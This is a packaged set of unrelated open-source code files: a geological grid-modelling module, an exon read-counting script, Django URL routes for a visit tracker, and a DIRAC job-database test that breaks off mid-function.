            layer_thicknesses.append(500)
        strati_options = {'num_layers' : len(self.unit_ids),
                          'layer_names' : layer_names,
                          'layer_thickness' : layer_thicknesses}
        nm.add_event('stratigraphy', strati_options)
        # set grid origin and extent:
        nm.set_origin(self.xmin, self.ymin, self.zmin)
        nm.set_extent(self.extent_x, self.extent_y, self.extent_z)
        nm.write_history(history)
    def set_dimensions(self, **kwds):
        """Set model dimensions, if no argument provided: xmin = 0, max = sum(delx) and accordingly for y,z
        **Optional keywords**:
            - *dim* = (xmin, xmax, ymin, ymax, zmin, zmax) : set dimensions explicitly
        """
        if kwds.has_key("dim"):
            (self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = kwds['dim']
        else:
            self.xmin, self.ymin, self.zmin = (0., 0., 0.)
            self.xmax, self.ymax, self.zmax = (sum(self.delx), sum(self.dely), sum(self.delz))
    def determine_cell_centers(self):
        """Determine cell centers for all coordinate directions in "real-world" coordinates"""
        if not hasattr(self, 'xmin'):
            raise AttributeError("Please define grid dimensions first")
        sum_delx = np.cumsum(self.delx)
        sum_dely = np.cumsum(self.dely)
        sum_delz = np.cumsum(self.delz)
        # centre of cell i = cumulative distance to its far edge minus half its width
        self.cell_centers_x = np.array([sum_delx[i] - self.delx[i] / 2. for i in range(self.nx)]) + self.xmin
        self.cell_centers_y = np.array([sum_dely[i] - self.dely[i] / 2. for i in range(self.ny)]) + self.ymin
        self.cell_centers_z = np.array([sum_delz[i] - self.delz[i] / 2. for i in range(self.nz)]) + self.zmin
    def determine_cell_boundaries(self):
        """Determine cell boundaries for all coordinates in "real-world" coordinates"""
        # NOTE(review): unlike determine_cell_centers, the boundary arrays are
        # NOT shifted by xmin/ymin/zmin - they start at 0. TODO confirm intent.
        if not hasattr(self, 'xmin'):
            raise AttributeError("Please define grid dimensions first")
        sum_delx = np.cumsum(self.delx)
        sum_dely = np.cumsum(self.dely)
        sum_delz = np.cumsum(self.delz)
        self.boundaries_x = np.ndarray((self.nx+1))
        self.boundaries_x[0] = 0
        self.boundaries_x[1:] = sum_delx
        self.boundaries_y = np.ndarray((self.ny+1))
        self.boundaries_y[0] = 0
        self.boundaries_y[1:] = sum_dely
        self.boundaries_z = np.ndarray((self.nz+1))
        self.boundaries_z[0] = 0
        self.boundaries_z[1:] = sum_delz
        # create a list with all bounds
        self.bounds = [self.boundaries_y[0], self.boundaries_y[-1],
                       self.boundaries_x[0], self.boundaries_x[-1],
                       self.boundaries_z[0], self.boundaries_z[-1]]
    def adjust_gridshape(self):
        """Reshape numpy array to reflect model dimensions"""
        # loadtxt returns a flat array ordered (z, y, x); reshape and swap to (x, y, z)
        self.grid = np.reshape(self.grid, (self.nz, self.ny, self.nx))
        self.grid = np.swapaxes(self.grid, 0, 2)
        # self.grid = np.swapaxes(self.grid, 0, 1)
    def plot_section(self, direction, cell_pos='center', **kwds):
        """Plot a section through the model in a given coordinate direction
        **Arguments**:
            - *direction* = 'x', 'y', 'z' : coordinate direction for section position
            - *cell_pos* = int/'center','min','max' : cell position, can be given as
            value of cell id, or as 'center' (default), 'min', 'max' for simplicity
        **Optional Keywords**:
            - *cmap* = mpl.colormap : define colormap for plot (default: jet)
            - *colorbar* = bool: attach colorbar (default: True)
            - *rescale* = bool: rescale color bar to range of visible slice (default: False)
            - *ve* = float : vertical exageration (for plots in x,y-direction)
            - *figsize* = (x,y) : figsize settings for plot
            - *ax* = matplotlib.axis : add plot to this axis (default: new axis)
            if axis is defined, the axis is returned and the plot not shown
            Note: if ax is passed, colorbar is False per default!
            - *savefig* = bool : save figure to file (default: show)
            - *fig_filename* = string : filename to save figure
        """
        colorbar = kwds.get('colorbar', True)
        cmap = kwds.get('cmap', 'jet')
        rescale = kwds.get('rescale', False)
        ve = kwds.get('ve', 1.)
        figsize = kwds.get('figsize', (8,4))
        if direction == 'x':
            if type(cell_pos) == str:
                # decipher cell position
                if cell_pos == 'center' or cell_pos == 'centre':
                    pos = self.nx / 2
                elif cell_pos == 'min':
                    pos = 0
                elif cell_pos == 'max':
                    # NOTE(review): nx is one past the last valid index;
                    # self.nx - 1 may be intended. TODO confirm.
                    pos = self.nx
            else:
                pos = cell_pos
            grid_slice = self.grid[pos,:,:]
            grid_slice = grid_slice.transpose()
            aspect = self.extent_z/self.extent_x * ve
        elif direction == 'y':
            if type(cell_pos) == str:
                # decipher cell position
                if cell_pos == 'center' or cell_pos == 'centre':
                    pos = self.ny / 2
                elif cell_pos == 'min':
                    pos = 0
                elif cell_pos == 'max':
                    pos = self.ny
            else:
                pos = cell_pos
            grid_slice = self.grid[:,pos,:]
            grid_slice = grid_slice.transpose()
            aspect = self.extent_z/self.extent_y * ve
        elif direction == 'z' :
            if type(cell_pos) == str:
                # decipher cell position
                if cell_pos == 'center' or cell_pos == 'centre':
                    pos = self.nz / 2
                elif cell_pos == 'min':
                    pos = 0
                elif cell_pos == 'max':
                    pos = self.nz
            else:
                pos = cell_pos
            grid_slice = self.grid[:,:,pos].transpose()
            aspect = 1.
        if not kwds.has_key('ax'):
            colorbar = kwds.get('colorbar', True)
            # create new axis for plot
            fig = plt.figure(figsize=figsize)
            ax = fig.add_subplot(111)
        else:
            colorbar = False
            ax = kwds['ax']
        if not hasattr(self, 'unit_ids'):
            self.determine_geology_ids()
        if rescale:
            vmin = np.min(grid_slice)
            vmax = np.max(grid_slice)
        else: # use global range for better comparison
            vmin = min(self.unit_ids)
            vmax = max(self.unit_ids)
        # NOTE(review): matplotlib's imshow expects origin='lower' or 'upper';
        # 'lower_left' looks like an invalid value. TODO confirm against the
        # matplotlib version in use.
        im = ax.imshow(grid_slice, interpolation='nearest',
                       cmap = cmap,
                       origin='lower_left',
                       vmin = vmin,
                       vmax = vmax,
                       aspect = aspect)
        if colorbar:
            # divider = mpl_toolkits.axes_grid1.make_axes_locatable(ax)
            # cax = divider.append_axes("bottom", size="5%", pad=0.2)
            cbar1 = fig.colorbar(im, orientation="horizontal")
            ticks = np.arange(vmin, vmax+0.1, int(np.log2(vmax-vmin)/1.2), dtype='int')
            cbar1.set_ticks(ticks)
            # cbar1.set_ticks(self.unit_ids[::int(np.log2(len(self.unit_ids)/2))])
            cbar1.set_label("Geology ID")
            # cax.xaxis.set_major_formatter(FormatStrFormatter("%d"))
        if kwds.has_key("ax"):
            # return image and do not show
            return im
        if kwds.has_key('savefig') and kwds['savefig']:
            # save to file
            filename = kwds.get("fig_filename", "grid_section_direction_%s_pos_%d.png" %
                                (direction, cell_pos))
            plt.savefig(filename)
        else:
            plt.show()
    def export_to_vtk(self, vtk_filename="geo_grid", real_coords = True, **kwds):
        """Export grid to VTK for visualisation
        **Arguments**:
            - *vtk_filename* = string : vtk filename (obviously...)
            - *real_coords* = bool : model extent in "real world" coordinates
        **Optional Keywords**:
            - *grid* = numpy grid : grid to save to vtk (default: self.grid)
            - *var_name* = string : name of variable to plot (default: Geology)
        Note: requires pyevtk, available at: https://bitbucket.org/pauloh/pyevtk
        """
        grid = kwds.get("grid", self.grid)
        var_name = kwds.get("var_name", "Geology")
        from evtk.hl import gridToVTK
        # define coordinates
        x = np.zeros(self.nx + 1)
        y = np.zeros(self.ny + 1)
        z = np.zeros(self.nz + 1)
        x[1:] = np.cumsum(self.delx)
        y[1:] = np.cumsum(self.dely)
        z[1:] = np.cumsum(self.delz)
        # plot in coordinates
        if real_coords:
            x += self.xmin
            y += self.ymin
            z += self.zmin
        gridToVTK(vtk_filename, x, y, z,
                  cellData = {var_name: grid})
    def export_to_csv(self, filename = "geo_grid.csv"):
        """Export grid to x,y,z,value pairs in a csv file
        Ordering is x-dominant (first increase in x, then y, then z)
        **Arguments**:
            - *filename* = string : filename of csv file (default: geo_grid.csv)
        """
        # NOTE(review): this iterates over the cell *sizes* (delx/dely/delz)
        # and uses them both as coordinates and as grid indices - cell
        # indices/centres look intended instead. The format string also lacks
        # a trailing "\n", so all rows end up on one line. TODO confirm/fix.
        f = open(filename, 'w')
        for zz in self.delz:
            for yy in self.dely:
                for xx in self.delx:
                    f.write("%.1f,%.1f,%.1f,%.d" % (xx,yy,zz,self.grid[xx,yy,zz]))
        f.close()
    def determine_geology_ids(self):
        """Determine all ids assigned to cells in the grid"""
        self.unit_ids = np.unique(self.grid)
    def get_name_mapping_from_file(self, filename):
        """Get the mapping between unit_ids in the model and real geological names
        from a csv file (e.g. the SHEMAT property file)
        **Arguments**:
            - *filename* = string : filename of csv file with id, name entries
        """
        self.unit_name = {}
        filelines = open(filename, 'r').readlines()[1:]
        for line in filelines:
            l = line.split(",")
            # column 0 = name, column 1 = id
            self.unit_name[int(l[1])] = l[0]
    def get_name_mapping_from_dict(self, unit_name_dict):
        """Get the name mapping directly from a dictionary
        **Arguments**:
            - *unit_name_dict* = dict with "name" : unit_id (int) pairs
        """
        self.unit_name = unit_name_dict
    def remap_ids(self, mapping_dictionary):
        """Remap geological unit ids to new ids as defined in mapping dictionary
        **Arguments**:
            - *mapping_dictionary* = dict : {1 : 1, 2 : 3, ...} : e.g.: retain
            id 1, but map id 2 to 3 (note: if id not specified, it will be retained)
        """
        # first step: create a single mesh for each id to avoid accidential
        # overwriting below (there might be a better solution...)
        if not hasattr(self, 'unit_ids'):
            self.determine_geology_ids()
        geol_grid_ind = {}
        for k,v in mapping_dictionary.items():
            geol_grid_ind[k] = self.grid == k
            print("Remap id %d -> %d" % (k,v))
        # now reassign values in actual grid
        for k,v in mapping_dictionary.items():
            print("Reassign id %d to grid" % v)
            self.grid[geol_grid_ind[k]] = v
        # update global geology ids
        self.determine_geology_ids()
    def determine_cell_volumes(self):
        """Determine cell volumes for each cell (e.g. for total formation volume calculation)"""
        self.cell_volume = np.ndarray(np.shape(self.grid))
        for k,dz in enumerate(self.delz):
            for j,dy in enumerate(self.dely):
                for i,dx in enumerate(self.delx):
                    self.cell_volume[i,j,k] = dx * dy * dz
    def determine_indicator_grids(self):
        """Determine indicator grids for all geological units"""
        # indicator grid for a unit is 1. where the cell has that unit id, else 0.
        self.indicator_grids = {}
        if not hasattr(self, 'unit_ids'):
            self.determine_geology_ids()
        grid_ones = np.ones(np.shape(self.grid))
        for unit_id in self.unit_ids:
            self.indicator_grids[unit_id] = grid_ones * (self.grid == unit_id)
    def determine_id_volumes(self):
        """Determine the total volume of each unit id in the grid
        (for example for cell discretisation studies, etc."""
        if not hasattr(self, 'cell_volume'):
            self.determine_cell_volumes()
        if not hasattr(self, 'indicator_grids'):
            self.determine_indicator_grids()
        self.id_volumes = {}
        for unit_id in self.unit_ids:
            self.id_volumes[unit_id] = np.sum(self.indicator_grids[unit_id] * self.cell_volume)
    def print_unit_names_volumes(self):
        """Formatted output to STDOUT of unit names (or ids, if names are note
        defined) and calculated volumes
        """
        # NOTE(review): 'id_vikumes' is a typo for 'id_volumes', so the check
        # never succeeds and volumes are recomputed on every call; harmless
        # but wasteful. TODO confirm/fix.
        if not hasattr(self, 'id_vikumes'):
            self.determine_id_volumes()
        if hasattr(self, "unit_name"):
            # print with real geological names
            print("Total volumes of modelled geological units:\n")
            for unit_id in self.unit_ids:
                print("%26s : %.2f km^3" % (self.unit_name[unit_id],
                                            self.id_volumes[unit_id]/1E9))
        else:
            # print with unit ids only
            print("Total volumes of modelled geological units:\n")
            for unit_id in self.unit_ids:
                print("%3d : %.2f km^3" % (unit_id,
                                           self.id_volumes[unit_id]/1E9))
    def extract_subgrid(self, subrange, **kwds):
        """Extract a subgrid model from existing grid
        **Arguments**:
            - *subrange* = (x_from, x_to, y_from, y_to, z_from, z_to) : range for submodel in either cell or world coords
        **Optional keywords**:
            - *range_type* = 'cell', 'world' : define if subrange in cell ids (default) or real-world coordinates
        """
        range_type = kwds.get('range_type', 'cell')
        if not hasattr(self, 'boundaries_x'):
            self.determine_cell_boundaries()
        if range_type == 'world':
            # determine cells
            # world coordinates are converted in place to the enclosing cell ids
            subrange[0] = np.argwhere(self.boundaries_x > subrange[0])[0][0]
            subrange[1] = np.argwhere(self.boundaries_x < subrange[1])[-1][0]
            subrange[2] = np.argwhere(self.boundaries_y > subrange[2])[0][0]
            subrange[3] = np.argwhere(self.boundaries_y < subrange[3])[-1][0]
            subrange[4] = np.argwhere(self.boundaries_z > subrange[4])[0][0]
            subrange[5] = np.argwhere(self.boundaries_z < subrange[5])[-1][0]
        # create a copy of the original grid
        import copy
        subgrid = copy.deepcopy(self)
        # extract grid
        subgrid.grid = self.grid[subrange[0]:subrange[1],
                                 subrange[2]:subrange[3],
                                 subrange[4]:subrange[5]]
        subgrid.nx = subrange[1] - subrange[0]
        subgrid.ny = subrange[3] - subrange[2]
        subgrid.nz = subrange[5] - subrange[4]
        # update extent
        subgrid.xmin = self.boundaries_x[subrange[0]]
        subgrid.xmax = self.boundaries_x[subrange[1]]
        subgrid.ymin = self.boundaries_y[subrange[2]]
        subgrid.ymax = self.boundaries_y[subrange[3]]
        subgrid.zmin = self.boundaries_z[subrange[4]]
        subgrid.zmax = self.boundaries_z[subrange[5]]
        subgrid.extent_x = subgrid.xmax - subgrid.xmin
        subgrid.extent_y = subgrid.ymax - subgrid.ymin
        subgrid.extent_z = subgrid.zmax - subgrid.zmin
        # update cell spacings
        subgrid.delx = self.delx[subrange[0]:subrange[1]]
        subgrid.dely = self.dely[subrange[2]:subrange[3]]
        subgrid.delz = self.delz[subrange[4]:subrange[5]]
        # now: update other attributes:
        subgrid.determine_cell_centers()
        subgrid.determine_cell_boundaries()
        subgrid.determine_cell_volumes()
        subgrid.determine_geology_ids()
        # finally: return subgrid
        return subgrid
# ******************************************************************************
# Some additional helper functions
# ******************************************************************************
def combine_grids(G1, G2, direction, merge_type = 'keep_first', **kwds):
    """Combine two grids along one axis
    ..Note: this implementation assumes (for now) that the overlap is perfectly matching,
    i.e. grid cell sizes identical and at equal positions, or that they are perfectly adjacent!
    **Arguments**:
        - G1, G2 = GeoGrid : grids to be combined
        - direction = 'x', 'y', 'z': direction in which grids are combined
        - merge_type = method to combine grid:
            'keep_first' : keep elements of first grid (default)
            'keep_second' : keep elements of second grid
            'random' : randomly choose an element to retain
        ..Note: all other dimensions must be matching perfectly!!
    **Optional keywords**:
        - *overlap_analysis* = bool : perform a detailed analysis of the overlapping area, including
        mismatch. Also returns a second item, a GeoGrid with information on mismatch!
    **Returns**:
        - *G_comb* = GeoGrid with combined grid
        - *G_overlap* = Geogrid with analysis of overlap (of overlap_analysis=True)

    NOTE(review): only direction == 'y' is implemented below; the 'x'
    and 'z' branches are stubs ('pass') and silently return an empty
    GeoGrid -- confirm whether that is intended.
    """
    overlap_analysis = kwds.get("overlap_analysis", False)
    # first step: determine overlap extent along the combination axis,
    # and alias the grid reaching higher/lower along that axis.
    if direction == 'x':
        if G2.xmax > G1.xmax:
            overlap_min = G2.xmin
            overlap_max = G1.xmax
            # identifier alias for grids with higher/ lower values
            G_high = G2
            G_low = G1
        else:
            overlap_min = G1.xmin
            overlap_max = G2.xmax
            # identifier alias for grids with higher/ lower values
            G_high = G1
            G_low = G2
        # check if all other dimensions are perfectly matching
        if (G1.ymin != G2.ymin) or (G1.zmin != G2.zmin) or \
           (G1.ymax != G2.ymax) or (G1.zmax != G2.zmax):
            raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
    elif direction == 'y':
        if G2.ymax > G1.ymax:
            overlap_min = G2.ymin
            overlap_max = G1.ymax
            # identifier alias for grids with higher/ lower values
            G_high = G2
            G_low = G1
        else:
            overlap_min = G1.ymin
            overlap_max = G2.ymax
            # identifier alias for grids with higher/ lower values
            G_high = G1
            G_low = G2
        # check if all other dimensions are perfectly matching
        if (G1.xmin != G2.xmin) or (G1.zmin != G2.zmin) or \
           (G1.xmax != G2.xmax) or (G1.zmax != G2.zmax):
            raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
    elif direction == 'z':
        if G2.zmax > G1.zmax:
            overlap_min = G2.zmin
            overlap_max = G1.zmax
            # identifier alias for grids with higher/ lower values
            G_high = G2
            G_low = G1
        else:
            overlap_min = G1.zmin
            overlap_max = G2.zmax
            # identifier alias for grids with higher/ lower values
            G_high = G1
            G_low = G2
        # check if all other dimensions are perfectly matching
        if (G1.ymin != G2.ymin) or (G1.xmin != G2.xmin) or \
           (G1.ymax != G2.ymax) or (G1.xmax != G2.xmax):
            raise ValueError("Other dimensions (apart from %s) not perfectly matching! Check and try again!" % direction)
    overlap = overlap_max - overlap_min
    if overlap == 0:
        print("Grids perfectly adjacent")
    elif overlap < 0:
        raise ValueError("No overlap between grids! Check and try again!")
    else:
        print("Positive overlap in %s direction of %f meters" % (direction, overlap))
    # determine cell centers
    G1.determine_cell_centers()
    G2.determine_cell_centers()
    # intialise new grid
    G_comb = GeoGrid()
    # initialise overlap grid, if analyis performed
    if overlap_analysis:
        G_overlap = GeoGrid()
    if direction == 'x':
        pass
    elif direction == 'y':
        #=======================================================================
        # Perform overlap analysis
        #=======================================================================
        # initialise overlap grid with dimensions of overlap
        # NOTE(review): G_overlap only exists when overlap_analysis is
        # True, yet this block runs unconditionally -- a NameError when
        # overlap_analysis=False; confirm and guard if needed.
        G_overlap.set_dimensions(dim = (G1.xmin, G1.xmax, overlap_min, overlap_max, G1.zmin, G1.zmax))
        # cell indices of the overlapping region in the low/high grid
        G_low_ids = np.where(G_low.cell_centers_y > overlap_min)[0]
        G_high_ids = np.where(G_high.cell_centers_y < overlap_max)[0]
        delx = G1.delx
        dely = G_low.dely[G_low_ids]
        delz = G1.delz
        G_overlap.set_delxyz((delx, dely, delz))
        # check if overlap region is identical
        if not (len(G_low_ids) == len(G_high_ids)):
            raise ValueError("Overlap length not identical, please check and try again!")
        # now: determine overlap mismatch (cellwise id difference)
        G_overlap.grid = G_low.grid[:,G_low_ids,:] - G_high.grid[:,G_high_ids,:]
        # for some very strange reason, this next step is necessary to enable the VTK
        # export with pyevtk - looks like a bug in pyevtk...
        G_overlap.grid = G_overlap.grid + np.zeros(G_overlap.grid.shape)
        #
        #=======================================================================
        # Set up combined grid
        #=======================================================================
        G_comb.set_dimensions(dim = (G1.xmin, G1.xmax, G_low.ymin, G_high.ymax, G1.zmin, G1.zmax))
        # combine dely arrays: non-overlap part of the low grid + all of
        # the high grid (overlap cells counted once, from G_high)
        dely = np.hstack((G_low.dely[:G_low_ids[0]], G_high.dely))
        G_comb.set_delxyz((delx, dely, delz))
        #=======================================================================
        # Now merge grids
        #=======================================================================
        if merge_type == 'keep_first':
            if G1.ymax > G2.ymax:
                G_comb.grid = np.concatenate((G2.grid[:,:G_low_ids[0],:], G1.grid), axis=1)
            else:
                # NOTE(review): this branch appends the *leading* cells of
                # G2 after G1 rather than G2's part above the overlap --
                # looks inconsistent with the branch above; verify.
                G_comb.grid = np.concatenate((G1.grid, G2.grid[:,:G_low_ids[0],:]), axis=1)
        elif merge_type == 'keep_second':
            pass
        elif merge_type == 'random':
            pass
        else:
            raise ValueError("Merge type %s not recognised! Please check and try again!" % merge_type)
    elif direction == 'z':
        pass
    # Return combined grid and results of overlap analysis, if determined
    if overlap_analysis:
        return G_comb, G_overlap
    else:
        return G_comb
def optimial_cell_increase(starting_cell_width, n_cells, width):
    """Determine an array with optimal cell widths for a defined starting
    cell width, total number of cells, and total width.

    The cell widths form a geometric progression; this function solves
    for the increase factor between neighbouring cells so that the sum
    of all widths matches the requested total.

    **Arguments**:
        - *starting_cell_width* = float : width of starting/ inner cell
        - *n_cells* = int : total number of cells
        - *width* = float : total width (sum over all elements in array)
          (doc fix: previously documented as *total_width*)
    **Returns**:
        del_array : numpy.ndarray with cell discretisations
    Note: optimisation with scipy.optimize - better (analytical?) methods
    might exist, but this keeps the original numerical approach.
    """
    import scipy.optimize

    def del_array(inc_factor, inner_cell, n_cells):
        # Geometric progression of widths: inner_cell * inc_factor**i
        return np.array([inner_cell * inc_factor ** i for i in range(n_cells)])

    def width_sum(inc_factor, inner_cell, n_cells, total_width):
        # Residual between achieved and requested total width (root target).
        return sum(del_array(inc_factor, inner_cell, n_cells)) - total_width

    # Solve for the increase factor that makes the widths sum to `width`;
    # 1.1 is the initial guess for the factor.
    opti_factor = scipy.optimize.fsolve(width_sum, 1.1,
                                        (starting_cell_width, n_cells, width))
    # fsolve returns an array; flatten the per-cell widths to 1-D.
    return del_array(opti_factor, starting_cell_width, n_cells).flatten()
if __name__ == '__main__':
pass
| flohorovicic/pygeomod | pygeomod/geogrid.py | Python | mit | 38,875 | [
"VTK"
] | dee58c68c7d6c6f6db378df693eda6bf33203b195158641ec88a897376a140d7 |
#!/usr/bin/python
"""
This script is an HTSeq alternatives.
It is count reads in regions, but if there
are overlapping regions the read is counted in both
regions. Read also counted if partially overlap
"""
import sys
import gzip
class Exon:
    """One exon record parsed from a whitespace-split GTF line."""

    def __init__(self, fields):
        # GTF attribute values arrive as '"value";' -- drop the quotes
        # and the trailing separator character.
        strip_attr = lambda raw: raw.replace('"', "")[:-1]
        self.chrx = fields[0]                    # chromosome / contig name
        self.start = int(fields[3])              # exon start coordinate
        self.stop = int(fields[4])               # exon stop coordinate
        self.tr = strip_attr(fields[13])         # transcript id
        self.exonnum = int(strip_attr(fields[17]))  # exon number
        self.genesym = strip_attr(fields[19])    # gene symbol
        self.count = 0                           # overlapping-read counter
def incAllExons(pos, length, array, lowindex, hiindex):
    """Increment the counter of every exon in `array` that a read
    starting at `pos` with `length` bases overlaps, even partially.

    `array` must be sorted by exon start; the function binary-searches
    down to a small window and then scans forward linearly, stopping as
    soon as an exon starts past the read end.
    """
    if hiindex - lowindex < 2:
        # Window narrowed down: scan forward and count every overlap.
        for i in range(lowindex, len(array)):
            if array[i].start < pos + length and array[i].stop > pos:
                array[i].count += 1
            if array[i].start > pos + length:
                # Array is sorted by start: no later exon can overlap.
                break
    else:
        # Bug fix: use floor division so the midpoint stays an int under
        # Python 3 as well ('/' yields a float there, breaking range()).
        midindex = lowindex + (hiindex - lowindex) // 2
        if array[lowindex].start < pos + length and array[midindex].stop > pos:
            incAllExons(pos, length, array, lowindex, midindex)
        else:
            incAllExons(pos, length, array, midindex, hiindex)
# ---- main script (Python 2) ----
# Build a per-chromosome list of Exon records from a gzipped GTF file
# (argv[1]), then stream SAM-like lines from stdin and count reads that
# overlap each exon (unique mappers only, MAPQ == 255).
gtf = dict()
gtffile = gzip.open(sys.argv[1])
for line in gtffile:
    if line.startswith("#"):
        # skip header/comment lines
        continue
    fields = line.split()
    if fields[2] != "exon":
        # only exon features are counted
        continue
    exon = Exon(fields)
    if fields[0] not in gtf:
        gtf[fields[0]] = list()
    gtf[fields[0]].append(exon)
gtffile.close()
# Sort each chromosome's exons by start so incAllExons can binary-search.
for i in gtf:
    gtf[i] = sorted(gtf[i], key = lambda x:x.start)
readcount = 0
for i in sys.stdin:
    fields = i.rstrip().split("\t")
    # MAPQ 255 marks uniquely mapped reads (e.g. STAR convention)
    if fields[4] == "255":
        pos = int(fields[3])
        chrx = fields[2]
        length = len(fields[9])
        readcount += 1
        # NOTE(review): a read on a chromosome absent from the GTF
        # raises KeyError here -- confirm input is always consistent.
        incAllExons(pos, length, gtf[chrx], 0, len(gtf[chrx]) - 1)
# Emit one count line per exon, then the total processed-read count.
for i in gtf:
    for exon in gtf[i]:
        print "%s_%s:%d\t%d" % (exon.genesym, exon.tr, exon.exonnum, exon.count)
print "__readcount\t" + str(readcount)
| TravisCG/SI_scripts | exonreadcount.py | Python | gpl-3.0 | 1,804 | [
"HTSeq"
] | a9f9480574f70bdfc9902b7cd6517135c9663f9d260982c1722af4ced83ad0e9 |
from django.conf.urls import url
from . import views
# Route table for the tracking app.  Domain and visitor identifiers are
# captured as 1-36 character slugs (long enough for UUIDs); task
# commands are restricted to a fixed verb set via the alternation group.
urlpatterns = [
    # NOTE(review): 'downlad.js' below looks like a typo for
    # 'download.js' (the view is named downloadJS); fixing it would
    # change a public URL, so confirm with existing clients first.
    url(r'^(?P<domain>.{1,36})/downlad.js/?$', views.downloadJS, name='downloadJS'),
    # visit trackers, with and without an explicit visitor id
    url(r'^(?P<domain>.{1,36})/visit.js/?$', views.trackerJS, name='trackerJS'),
    url(r'^(?P<domain>.{1,36})/visit.js/(?P<visitor>.{1,36})/?$', views.trackerJS, name='trackerJS'),
    url(r'^(?P<domain>.{1,36})/visit.svg/?$', views.trackerSVG, name='trackerSVG'),
    url(r'^(?P<domain>.{1,36})/visitd.svg/?$', views.trackerDATAS, name='trackerDATAS'),
    url(r'^(?P<domain>.{1,36})/visitv.svg/?$', views.trackerEVENTS, name='trackerEVENTS'),
    url(r'^(?P<domain>.{1,36})/visit.svg/(?P<visitor>.{1,36})/?$', views.trackerSVG, name='trackerSVG'),
    url(r'^(?P<domain>.{1,36})/visitd.svg/(?P<visitor>.{1,36})/?$', views.trackerDATAS, name='trackerDATAS'),
    url(r'^(?P<domain>.{1,36})/visitv.svg/(?P<visitor>.{1,36})/?$', views.trackerEVENTS, name='trackerEVENTS'),
    # aggregate data exports in several formats
    url(r'^tracker/ndatas.csv/?$', views.ndatasCSV, name='ndatasCSV'),
    url(r'^tracker/ndatas.json/?$', views.ndatasJSON, name='ndatasJSON'),
    url(r'^tracker/ndatas.txt/?$', views.ndatasTXT, name='ndatasTXT'),
    url(r'^tracker/hourly/hdatas.csv/?$', views.hdatasCSV, name='hdatasCSV'),
    url(r'^tracker/hourly/hdatas.json/?$', views.hdatasJSON, name='hdatasJSON'),
    url(r'^tracker/hourly/hdatas.txt/?$', views.hdatasTXT, name='hdatasTXT'),
    # subtask reports keyed on two numeric ids
    url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.csv/?', views.subtaskCSV, name='subtaskCSV'),
    url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.json/?', views.subtaskJSON, name='subtaskJSON'),
    url(r'^tracker/(?P<task>\d+)/(?P<secondtask>\d+)/subtask.txt/?', views.subtaskTXT, name='subtaskTXT'),
    # task status updates, with an optional trailing free-form message
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.json/?$', views.taskJSON, name='taskJSON'),
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.json/(?P<message>.+)/?$', views.taskJSON, name='taskJSON'),
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.txt/?$', views.taskTXT, name='taskTXT'),
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.txt/(?P<message>.+)/?$', views.taskTXT, name='taskTXT'),
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.html/?$', views.taskHTML, name='taskHTML'),
    url(r'^tracker/task/(?P<task>\d+)/(?P<command>(error|order|start|running|complete))/task.html/(?P<message>.+)/?$', views.taskHTML, name='taskHTML'),
]
"VisIt"
] | 1f7f0c215d5671fee10e8e5d4895c16b48b1a10b05b4e1708794fbd43745ed5f |
""" This tests only need the JobDB, and connects directly to it
Suggestion: for local testing, run this with::
python -m pytest -c ../pytest.ini -vv tests/Integration/WorkloadManagementSystem/Test_JobDB.py
"""
# pylint: disable=wrong-import-position
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
jdl = """
[
Origin = "DIRAC";
Executable = "$DIRACROOT/scripts/dirac-jobexec";
StdError = "std.err";
LogLevel = "info";
Site = "ANY";
JobName = "helloWorld";
Priority = "1";
InputSandbox =
{
"../../Integration/WorkloadManagementSystem/exe-script.py",
"exe-script.py",
"/tmp/tmpMQEink/jobDescription.xml",
"SB:FedericoSandboxSE|/SandBox/f/fstagni.lhcb_user/0c2/9f5/0c29f53a47d051742346b744c793d4d0.tar.bz2"
};
Arguments = "jobDescription.xml -o LogLevel=info";
JobGroup = "lhcb";
OutputSandbox =
{
"helloWorld.log",
"std.err",
"std.out"
};
StdOutput = "std.out";
InputData = "";
JobType = "User";
]
"""
gLogger.setLevel('DEBUG')
def fakegetDIRACPlatform(OSList):
    """Stub replacing JobDB.getDIRACPlatform for the tests: always
    succeed with a dummy platform name, regardless of the OS list."""
    result = {'OK': True, 'Value': 'pippo'}
    return result
jobDB = JobDB()
jobDB.getDIRACPlatform = fakegetDIRACPlatform
def test_insertAndRemoveJobIntoDB():
    """Insert a job from the module-level JDL, verify its freshly
    inserted state, then remove every job currently in the DB."""
    res = jobDB.insertNewJobIntoDB(jdl, 'owner', '/DN/OF/owner', 'ownerGroup', 'someSetup')
    assert res['OK'] is True
    jobID = res['JobID']
    # A newly inserted job must be in 'Received' / 'Job accepted'.
    res = jobDB.getJobAttribute(jobID, 'Status')
    assert res['OK'] is True
    assert res['Value'] == 'Received'
    res = jobDB.getJobAttribute(jobID, 'MinorStatus')
    assert res['OK'] is True
    assert res['Value'] == 'Job accepted'
    # No optimizer parameters are expected yet for a fresh job.
    res = jobDB.getJobOptParameters(jobID)
    assert res['OK'] is True
    assert res['Value'] == {}
    # Clean up: remove all jobs (empty condition dict selects everything).
    res = jobDB.selectJobs({})
    assert res['OK'] is True
    jobs = res['Value']
    for job in jobs:
        res = jobDB.removeJobFromDB(job)
        assert res['OK'] is True
def test_rescheduleJob():
    """Insert a job, reschedule it, and check the resulting status
    transitions back to 'Received' with minor status 'Job Rescheduled'."""
    res = jobDB.insertNewJobIntoDB(jdl, 'owner', '/DN/OF/owner', 'ownerGroup', 'someSetup')
    assert res['OK'] is True
    jobID = res['JobID']
    res = jobDB.rescheduleJob(jobID)
    assert res['OK'] is True
    # Rescheduling resets the main status and records the reschedule.
    res = jobDB.getJobAttribute(jobID, 'Status')
    assert res['OK'] is True
    assert res['Value'] == 'Received'
    res = jobDB.getJobAttribute(jobID, 'MinorStatus')
    assert res['OK'] is True
